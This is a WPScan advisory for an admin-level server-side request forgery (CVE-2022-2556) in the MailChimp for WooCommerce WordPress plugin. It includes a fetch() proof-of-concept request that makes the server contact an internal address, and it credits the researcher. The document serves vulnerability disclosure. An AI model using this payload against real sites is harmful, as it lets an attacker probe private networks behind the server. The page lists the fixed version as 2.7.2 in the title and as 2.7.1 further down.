WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

MailChimp for Woocommerce < 2.7.2 - Admin+ SSRF

Description

The plugin has an AJAX action that allows high privilege users to perform a POST request on behalf of the server to the internal network/LAN, the body of the request is also appended to the response so it can be used to scan private network for example

Proof of Concept

As an admin:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-language": "en-US,en;q=0.9",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": "action=mailchimp_woocommerce_oauth_status&url=http://127.0.0.1:8181",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Affects Plugins

mailchimp-for-woocommerce
Fixed in version 2.7.1

References

CVE
CVE-2022-2556

Classification

Type

SSRF

OWASP top 10
A1: Injection
CWE
CWE-918

Miscellaneous

Original Researcher

Miguel Xavier Penha Neto

Submitter

Miguel Xavier Penha Neto

Submitter website
https://www.miguelxpn.com
Submitter twitter
miguelxpn
Verified

Yes

WPVDB ID
f2a59eaa-6b44-4098-912f-823289cf33b0

Timeline

Publicly Published

2022-08-03 (about 4 months ago)

Added

2022-08-03 (about 4 months ago)

Last Updated

2022-08-03 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin